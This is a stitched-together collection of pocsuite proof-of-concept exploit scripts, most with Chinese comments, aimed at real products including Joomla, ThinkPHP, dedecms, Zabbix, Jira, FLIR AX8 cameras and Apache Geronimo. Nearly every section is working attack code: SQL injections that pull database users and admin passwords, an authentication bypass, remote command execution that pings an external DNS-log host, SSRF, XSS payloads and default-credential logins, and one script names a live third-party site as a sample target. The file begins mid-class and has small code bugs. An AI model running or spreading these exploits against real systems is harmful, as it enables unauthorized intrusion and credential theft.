    name = 'joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'joomla component The Estate Agent '
    appVersion = 'N/A'
    vulType = 'SQL injection'
    desc = '''
        joomla component The Estate Agent对参数id过滤不严，导致出现SQL注入漏洞。
        远程攻击者可以利用回显报错等方式，执行SQL指令，获取敏感信息。
    '''
    samples = ['http://www.loyolapropiedades.com.ar']

    def _attack(self):
        #利用SQL注入读取数据库信息
        result = {}
        #访问的地址
        exploit='/index.php?option=com_estateagent&act=cat&task=showCE&id='
        #利用Union方式读取信息
        payload="1  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
        "user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM "\
        "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- -"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #提取信息的正则表达式
        parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=80)
        #检查是否含有特征字符串
        if '$~~~$' in resp.content:
            #提取信息
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                #漏洞利用成功
                result['DbInfo']={}
                #数据库用户名
                result['DbInfo']['Username']=match.group(1)
                #数据库版本
                result['DbInfo']['Version']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        return self._attack()

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


"""

If you have issues about development, please read:

https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

for more about information, plz visit http://pocsuite.org

"""



from collections import OrderedDict



from pocsuite3.api import Output

from pocsuite3.api import POCBase

from pocsuite3.api import requests

from pocsuite3.api import OptString

from pocsuite3.api import register_poc

from pocsuite3.api import POC_CATEGORY





class DemoPOC(POCBase):

    vulID = '97809'  # ssvid

    version = '1.0'

    author = ['CTCcaozhe']

    vulDate = '2019-12-26'

    createDate = '2020-06-03'

    updateDate = '2020-06-03'

    references = ['https://github.com/vulhub/vulhub/tree/master/appweb/CVE-2018-8715']

    name = 'AppWeb认证绕过漏洞（CVE-2018-8715）'

    appPowerLink = 'https://www.embedthis.com/'

    appName = 'Nexus Repository Manager'

    appVersion = '7.0.3之前'

    vulType = 'login-bypass'

    desc = '''

        利用该漏洞需要知道一个已存在的用户名，当前环境下用户名为admin。

        构造头Authorization: Digest username=admin

        没有传入密码字段，直接返回了200，且包含一个session

        设置这个session到浏览器，即可正常访问需要认证的页面

        '''

    samples = ['http://192.168.34.137:8081/']

    install_requires = []

    category = POC_CATEGORY.EXPLOITS.WEBAPP

    protocol = POC_CATEGORY.PROTOCOL.HTTP



    def _options(self):

        o = OrderedDict()

        o["user"] = OptString('admin', description='这个poc需要已知的用户名', require=True)

        return o



    def _verify(self):

        result = {}

        get_headers = {

            'Accept-Encoding': 'gzip,deflate',

            'Content-Type': 'application/x-www-form-urlencoded',

            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',

            'Connection':'close',

            'Authorization':'Digest username = '+self.get_option("user")

        }

        vul_url = self.url

        if vul_url.endswith('/'):

            vul_url = vul_url[:-1]



        if "http://" in vul_url:

            host = vul_url[7:]

        elif "https://" in vul_url:

            host = vul_url[8:]

        else:

            host = vul_url



        get_headers['Host'] = host



        r = requests.get(url=vul_url,headers=get_headers)

        # print(r.cookies)

        print("使用Set-Cookie值中的session：导入浏览器即可登入:\n"+r.text)

        if r.status_code == 200:

            result['VerifyInfo'] = {}

            result['VerifyInfo']['URL'] = vul_url

            result['VerifyInfo']['content'] = r.contet



        return self.parse_output(result)



    def _attack(self):

        return self._verify()



    def parse_output(self, result):

        output = Output(self)

        if result:

            output.success(result)

        else:

            output.fail('target is not vulnerable')

        return output





register_poc(DemoPOC)


#!/usr/bin/env python
# coding: utf-8
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '83012'  # ssvid
    version = '1.0'
    author = ['x0day']
    vulDate = '2015-11-23'
    createDate = '2015-11-23'
    updateDate = '2015-11-23'
    references = ['http://www.sebug.net/vuldb/ssvid-83012']
    name = 'appRain 3.0.2 - Blind(or normal union query sqli) SQL Injection Vulnerability'
    appPowerLink = 'www.apprain.com'
    appName = 'appRain'
    appVersion = '3.0.2'
    vulType = 'SQL Injection'
    desc = '''this app->appRain 3.0.2 exists sql injection vulnerability,not only blind sqli,but also union query sqli vulnerability
    on the parameter "blog-by-cat" in "http://192.168.2.130/appRain-v-3.0.2/blog-by-cat/",we can exploit it like this "http://192.168.2.130/appRain-v-3.0.2/blog-by-cat/1 order by n"
    '''
    samples = ['http://192.168.2.130/appRain-v-3.0.2']



    def _attack(self):
        result = {}
        #Write your code here
        vul_url='%s/blog-by-cat' % self.url




        #to gain current_db name
        database_sqli='/-1 union select 1,2,3,4,concat(0x7e,database(),0x3a),6,7,8'
        database_url=vul_url+database_sqli
        resp=req.get(database_url)
        match_result=re.search(r'~(.*):',resp.content,re.I | re.M)
        #print resp.content
        a=match_result.group(1)
        match_result0=re.search(r'~(.*)',a,re.I | re.M)
        #print match_result0.group(1)
        current_db=match_result0.group(1)
        #got current_db name
        




        #to gain admin_table name
        db_hex=current_db.encode('hex')
        db_hex='0x'+db_hex
        #print 'db_hex is %s' % db_hex
        table_sqli='/-1 union select 1,2,3,4,group_concat(0x7e,table_name,0x3a),6,7,8 from information_schema.tables where table_schema=%s' % db_hex
        table_url=vul_url+table_sqli
        #print table_url
        resp=req.get(table_url)
        match_result0=re.search(r'~(.*administrators):',resp.content,re.I | re.M)
        a=match_result0.group(1)
        match_result1=re.search(r'>~(.*)',a,re.I | re.M)
        admin_table=match_result1.group(1)
        #print admin_table
        #got admin_table name





        #to gain key_column_value
        column_sqli='/-1 union select 1,2,3,4,group_concat(0x7e,username,0x3a,0x3a,0x3a,password,0x7e),6,7,8 from %s' % admin_table
        columns_url=vul_url+column_sqli
        #print columns_url
        response=req.get(columns_url)
        #print response.content
        if response.status_code==200:
            match_result1=re.search(r'~(.*):::(.*)~',response.content,re.I | re.M)
            a=match_result1.group(1)
            match_result2=re.search(r'(.*):::(.*)~',a,re.I | re.M)
            #print match_result2
            if match_result2:
                result['AdminInfo']={}
                result['AdminInfo']['Username']=match_result2.group(1)
                result['AdminInfo']['Password']=match_result1.group(2)
        return self.parse_output(result)




    def _verify(self):
        result = {}
        #Write your code here
        vul_url='%s/blog-by-cat' % self.url
        verify_url=vul_url+'/-1 union select 1,2,3,4,md5(1),6,7,8'
        resp=req.get(verify_url)
        if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            result['VerifyInfo']={}
            result['VerifyInfo']['URL']=vul_url
            result['VerifyInfo']['Payload']=verify_url
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from urlparse import urljoin

class TestPOC(POCBase):
    vulID = 'SSV-78938'  # vul ID
    version = '1'
    author = 'hzr'
    vulDate = '2005-03-24'
    createDate = '2015-10-26'
    updateDate = '2015-10-26'
    references = ['https://www.exploit-db.com/exploits/25272/','http://www.securityfocus.com/bid/12895/info']
    name = "Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability"
    appPowerLink = 'http://www.dream4.de/index.htm'
    appName = 'Dream4 Koobi CMS'
    appVersion = '4.2.3'
    vulType = 'XSS'
    desc = '''
         Dream4 Koobi CMS 4.2.3的index.php中存在跨站脚本攻击(XSS)漏洞，
         远程攻击者可以通过area参数注入任意Web脚本或HTML。
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        payload = '/index.php?area=<script>alert(/Sebug23333/)</script>'
        res = req.get(urljoin(self.url, payload), timeout=10)
        return self.parse_verify(res, payload, 'xss')

    def parse_verify(self, res, payload, type):
        output = Output(self)
        result = {}
        if  type == 'xss' and '<script>alert(/Sebug23333/)</script>' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)           
        else:
            output.fail('Internet Nothing returned')
        return output

    def _attack(self): 
        return self._verify()

register(TestPOC)


#!/usr/bin/python
# -*- coding: utf-8 -*-

import string
import time
from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.utils import randomStr


class TestPOC(POCBase):
    name = 'ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability'
    vulID = '3'  # https://www.seebug.org/vuldb/ssvid-93077
    author = ['liujun']
    vulType = 'cmd-exec'
    version = '1.0'    # default version: 1.0
    references = ['https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection']
    desc = '''ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability'''

    vulDate = '2017-07-04'
    createDate = '2019-03-23'
    updateDate = '2019-03-23'

    appName = 'Thinkphp'
    appVersion = '5.X'
    appPowerLink = 'http://www.thinkphp.cn/'
    samples = ['']


    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify mode"""
        result = {}
        self.url = self.url + "/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"
        #print self.url
        matchstring1 = 'sqlstate'
        matchstring2 = 'password'

        resp = req.get(self.url)

        if matchstring1 in resp.content.lower() and matchstring2 in resp.content.lower():
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
# Download Link: https://www.exploit-db.com/apps/969a9a0c12a219fb5e3658eeaff4e426-GeniXCMS-v0.0.3.zip

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID   ='123'
    version = '1'
    author = '小雨'
    vulDate = '2017-01-06'
    name = 'xss'
    appPowerLink = 'http://192.168.116.128/'
    appName = '无'
    appVersion = '0'
    vulType = ' XSS '
    desc = '''
    本地搭建环境随便写写
    '''

    def _verify(self):
        path = self.url + "/xss.php?XSS=<script>alert(1);</script>"
        res = req.get(path)
        return self.parse_verify(res)

    def parse_verify(self, res):
        output = Output(self)
        result = {}

        if res.status_code == 200 and '<script>alert(1);</script>' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output

    def _attack(self):

        return self._verify()


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from urlparse import urljoin

class TestPOC(POCBase):
    vulID = 'SSV-82196'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2006-9-21'
    createDate = '2015-10-16'
    updateDate = '2015-10-16'
    references = ['http://www.securityfocus.com/bid/20137']
    name = 'Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS'
    appPowerLink = 'http://sourceforge.net/projects/bandsitecms/'
    appName = 'Grayscale BandSite CMS'
    appVersion = '1.1.0'
    vulType = 'XSS'
    desc = '''  
        Grayscale BandSite CMS is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize
        user-supplied input data.These issues may allow an attacker to access sensitive information, execute arbitrary 
        server-side script code in the context of the affected webserver, or execute arbitrary script code in the browser of
        an unsuspecting user in the context of the affected site. This could help the attacker steal cookie-based 
        authentication credentials; other attacks are possible.Version 1.1.0 is vulnerable; other versions may also be affected.
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        payload = "/includes/footer.php?this_year=<script>alert(/Dirorder/)</script>"
        res = req.get(urljoin(self.url, payload), timeout=5)
        return self.parse_verify(res, payload, 'xss')

    def parse_verify(self, res, payload, type):
        output = Output(self)
        result = {}
        if  type == 'xss' and '>alert(/Dirorder/)<' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)           
        else:
            output.fail('Internet Nothing returned')
        return output

    def _attack(self): 
        return self._verify()

register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = ''  # vul ID
    version = '1'
    author = ['']
    vulDate = '2018-10-29'
    createDate = '2018-10-29'
    updateDate = '2018-10-29'
    references = ['https://cn.0day.today/exploit/31332']
    name = 'FLIR Systems FLIR AX8 Thermal Camera Command Injection'
    appPowerLink = 'http://www.flir.cn'
    appName = 'FLIR Systems'
    appVersion = 'FLIR AX8'
    vulType = 'Command Injection'
    desc = '''
         The FLIR AX8 thermal sensor camera suffers from two unauthenticated
         command injection vulnerabilities. The issues can be triggered when calling
         multiple unsanitized HTTP GET/POST parameters within the shell_exec function
         in res.php and palette.php file. This can be exploited to inject arbitrary
         system commands and gain root remote code execution.
    '''

    samples = ['']

    def _attack(self):
        head = {'Connection-Type':'application/x-www-form-urlencoded','Content-Type':'application/x-www-form-urlencoded'}
        payload = 'action=get&resource=%3Bid'
        
        response = req.post(self.url+'/res.php', data = payload,headers = head)     
        if response.content:
            return self.parse_attack(response.content)
        else:
            return self.parse_attack(False)
            
    def _verify(self):
        return self._attack()
        
    def parse_attack(self, content):
        output = Output(self)
        result = {}
        if content:
            result['result']={}
            result['result']['command'] = 'id'
            result['result']['result'] = content
            output.success(result)
        else:
            output.fail('Getshell failed')
        return output

register(TestPOC)



from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from urllib.parse import urlparse, parse_qs, urljoin
import requests

class TestPOC(POCBase):
 	
	vulID = '1'
	name = 'think_php_rce'
	appName = 'Thinkphp'
	appVersion = '5.0'
	desc = '测试过5.0.22,可用'
	
	def _verify(self):

			result = {}
			payload = {
					   '_method':'__construct',
					   'filter[]':'system',
					   'method':'get',
					   'get[]':'echo watch_dog'
			}
			url_parse = urlparse(self.url)
			if url_parse.query:
					qs = parse_qs(url_parse.query)						
					if 's' in qs:
							query_list = []
							for i in qs:
									if i == 's':
											qs[i][0] = 'captcha'
									query_list.append(i+'='+qs[i][0])
							query = '&'.join(query_list)
							url = url_parse.scheme+'://'+url_parse.netloc+url_parse.path+url_parse.params+'?'+query
					else:
						url = self.url+'&'+'s=captcha'
												
			else:
				url = self.url+'?'+'s=captcha'
			try:
				request = requests.post(url,payload)
				if request.text:
					if 'watch_dog' in request.text and '模块不存在:captcha' not in request.text:
							req = requests.post(url,payload)
							#print(req.text)
							print(url)
							result['VerifyInfo'] = {}
							result['VerifyInfo']['URL'] = url
							result['VerifyInfo']['Name'] = payload
						
			except Exception as e:
						pass
			return self.parse_output(result)

	
	def parse_output(self, result):
			output = Output(self)
			if result:
					output.success(result)
			else:
				output.fail('target is not vulnerable')
			return output


	def _attack(self):
			return self._verify()

register_poc(TestPOC)			



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import time
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register



class TestPOC(POCBase):
    name = u'璐华企业版OA系统 - sql injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=65421']
    desc = u'''璐华企业版OA系统多处SQL注入'''

    vulDate = '2014-09-17'
    createDate = '2019-03-21'
    updateDate = '2019-03-21'

    appName = '璐华企业版OA系统'
    appVersion = '6.2'
    appPowerLink = 'http://www.ruvar.com/'
    samples = ['re']

    def _attack(self):
        "attack mode"
        return self._verify()
        pass

    def _verify(self):
        "verify  mode"
        result = {}
        payload = {
            "/PersonalAffair/worklog_template_show.aspx?id=@@version",
            "/ProjectManage/pm_gatt_inc.aspx?project_id=@@version",
            "/WorkPlan/plan_template_preview.aspx?template_id=@@version",
            "/WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29>0%29--",
            "/WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29>0--",
            "/WorkFlow/wf_work_print.aspx?idlist=@@version",
            "/WorkFlow/wf_work_stat_setting.aspx?template_id=@@version",
            "/WorkFlow/wf_get_fields_approve.aspx?template_id=@@version"
        }
        for pay in payload:
            url = self.url + pay
            resp = req.get(url)
            # con = re.search('nvarchar', resp.text)
            time.sleep(2)
            if 'nvarchar' in resp.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)




#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase

class Zabbix(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-06'
    updateDate = '2019-11-06'
    references = ['']
    name = 'Zabbix 2.0.x <= 3.0.3 - latest SQL Injection'
    appPowerLink = ''
    appName = 'Zabbix'
    appVersion = 'Zabbix 2.0.x <= 3.0.3'
    vulType = 'SQL Injection'
    desc = ''' 
    Zabbix 2.0.x <= 3.0.3 - latest SQL注入漏洞
    '''

    @property
    def _get_url(self):
        if self.url[-1] == '/':
            url = self.url
        else:
            url = self.url + '/'
        return url

    def _verify(self):
        result = {}
        payload = 'latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1'
        try:
            url = self._get_url + payload
            response = requests.get(url)
            if 'web.latest.toggle' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(Zabbix)


#!/usr/bin/env python
#coding=utf-8

import random
import json
from string import ascii_letters
import time

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2019-11581
设置=> 系统=> 编辑设置=> 联系管理员表单处选择“开”
'''
class Jira_RCE_POC(POCBase):
    vulID = 'Jira-CVE-2019-11581'
    appName = 'Jira'
    appVersion = '''
    4.4.x
    5.x.x
    6.x.x
    7.0.x
    7.1.x
    7.2.x
    7.3.x
    7.4.x
    7.5.x
    7.6.x < 7.6.14
    7.7.x
    7.8.x
    7.9.x
    7.10.x
    7.11.x
    7.12.x
    7.13.x < 7.13.5
    8.0.x < 8.0.3
    8.1.x < 8.1.2
    8.2.x < 8.2.3
    '''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-07-10'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-02-17'  # 编写 PoC 的日期
    updateDate = '2020-02-17'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw']  # 漏洞地址来源,0day不用写
    name = 'Jira未授权服务端模板注入'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    http_proxy  = "http://127.0.0.1:8087"
    proxies = {"http": http_proxy, "https": http_proxy}


    def _verify(self):
        result={}

        vul_url = self.url
        
        target_url = vul_url + "/secure/ContactAdministrators.jspa"

        headers = {"X-Atlassian-Token": "no-check"}

        payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)
        qparams = (('from','JIRA@JIRA.com'),('subject',payload),('details','details'),('Send','Send'))

        
        try:
            req.post(target_url, headers = headers, data = qparams, proxies=self.proxies, verify=False, allow_redirects=False)
        except Exception as e:
            e.printStackTrace()
        
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)

    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


'''
CVE-2019-8451
'''
class Jira_SSRF_POC(POCBase):
    vulID = 'Jira-CVE-2019-8451'
    appName = 'Jira'
    appVersion = '''version < 8.4.0'''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.OTHER # 没有SSRF类型？
    vulDate = '2019-09-23'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-02-24'  # 编写 PoC 的日期
    updateDate = '2020-02-24'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A']  # 漏洞地址来源,0day不用写
    name = 'Jira未授权SSRF'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    http_proxy  = "http://127.0.0.1:8087"
    proxies = {"http": http_proxy, "https": http_proxy}


    def _verify(self):
        result={}

        vul_url = self.url

        payload = 'ip.cn:80'     # 换成dnslog的地址
        
        target_url = "{0}/plugins/servlet/gadgets/makeRequest?url={0}@{1}".format(vul_url, payload)

        headers = {"X-Atlassian-Token": "no-check"}

        
        try:
            req.get(target_url, headers = headers, proxies=self.proxies, verify=False)
        except Exception as e:
            e.printStackTrace()
        
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)


    # 验证DNS已被解析
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register_poc(Jira_RCE_POC)    # CVE-2019-11581
register_poc(Jira_SSRF_POC)    # CVE-2019-8451



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import time
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'apache_geronimo_weak_password'
    vulID = '0'
    author = ['LRestless']
    vulType = 'weak-pass'
    version = '1'
    references = ['']
    desc = u'''可以通过使用默认凭据访问ApacheGeronimo的管理控制台。
    Geronimo管理控制台的默认管理员用户名和密码和命令行部署工具分别为system和manager。
    您应该直接从Geronimo管理控制台通过访问Security->ConsoleRealm更改这些默认设置，
    并从控制台领域用户组件更改用户名和密码。'''

    vulDate = '2015-06-18'
    createDate = '2019-03-19'
    updateDate = '2019-03-20'

    appName = 'Apache Geronimo'
    appVersion = '3.0'
    appPowerLink = 'http://geronimo.apache.org/'
    samples = ['']

    def _attack(self):
        """attack mode"""
        return self._verify()
        pass

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        data = {
            'j_username': 'system',
            'j_password': 'manager',
            'submit': '登陆'
        }
        url = '/console/portal/j_security_check'
        self.url = self.url.strip('/') + url
        resp = s.post(self.url, data=data)
        time.sleep(2)
        if 'Logout' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
#!coding: utf-8
import re

from pocsuite.net import req
from pocsuite.poc import POCBase,Output
from pocsuite.utils import register

class Fuckdede(POCBase):
	vulID='4'
	version = '1'
	author = ['fengxuan']
	vulDate = '2016-2-4'
	createDate = '2016-2-4'
	updateDate = '2016-2-4'
	references = ['http://www.evalshell.com', 'http://zone.wooyun.org/content/2414']
	name = 'dedecms plus/search.php 注入漏洞利用EXP'
	appPowerLink = 'http://www.dedecms.cn/'
	appName = 'dedecms'
	appVersion = '5.7'
	vulType = 'SQL Injection'
	desc = '''
           开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量，使其他变量直接
           带入了SQL语句中，可以通过\字符来转义掉一个单引号，逃逸单引号，产生SQL注入。
           此注入为报错注入，可以通过UpdateXML函数进行注入。
    '''
	samples = ['']

	def _verify(self):
		result = {}
		target = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
		response = req.get(target)
		content = response.content
		if 'DedeCMS Error Warning!' in content:
			result = {'VerifyInfo':{}}
			result['VerifyInfo']['URL'] = self.url
		return self.parse_result(result)

	def _attack(self):
		return self._verify()

	def parse_result(self, result):
		output = Output(self)

		if result:
			output.success(result)
		else:
			output.fail("Internet Nothing returned")
		return output

register(Fuckdede)











#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class CORSPOC(POCBase):
    vulID = '37'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-06-05' #漏洞公开的时间,不知道就写今天

    author = 'colorway' #  PoC作者的大名
    createDate = '2018-06-05'# 编写 PoC 的日期
    updateDate = '2018-06-05'# PoC 更新的时间,默认和编写时间一样
    references = ''# 漏洞地址来源,0day不用写
    name = 'CORS'# PoC 名称
    appPowerLink = '#'# 漏洞厂商主页地址
    appName = 'http'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'HTTP Request Smuggling'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        HTTP CORS 跨域
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"低危" #严重,高危,中危,低危

    def _verify(self):
        #定义返回结果
        result = {}
        from urlparse import urlparse
        #获取漏洞IP
        vul_ip = urlparse(self.url).netloc
        origins = ['hack.com', 'hack'+vul_ip, vul_ip+'.hack.com']
        headers = {
                'Origin': 
                '',
                'Cache-Control':
                'no-cache',
                'Cookie':
                'a=b',
                'User-Agent':
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'
            }
        proxies = {
            # 'http': 'http://127.0.0.1:8080',
            # 'https':'http://127.0.0.1:8080',
        }
        for origin in origins:
            headers['Origin'] = origin
            try:
                response = req.head(url=self.url, headers=headers, timeout=5, proxies=proxies, allow_redirects=False)
                if response.headers['Access-Control-Allow-Origin']:
                    if origin in response.headers['Access-Control-Allow-Origin']:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = self.url
                        result['VerifyInfo']['Payload'] = "Origin: %s" % origin
                        break
                else:
                    result = {}
            except Exception as e:
                print(str(e))

        print('[+]37 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(CORSPOC)




#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

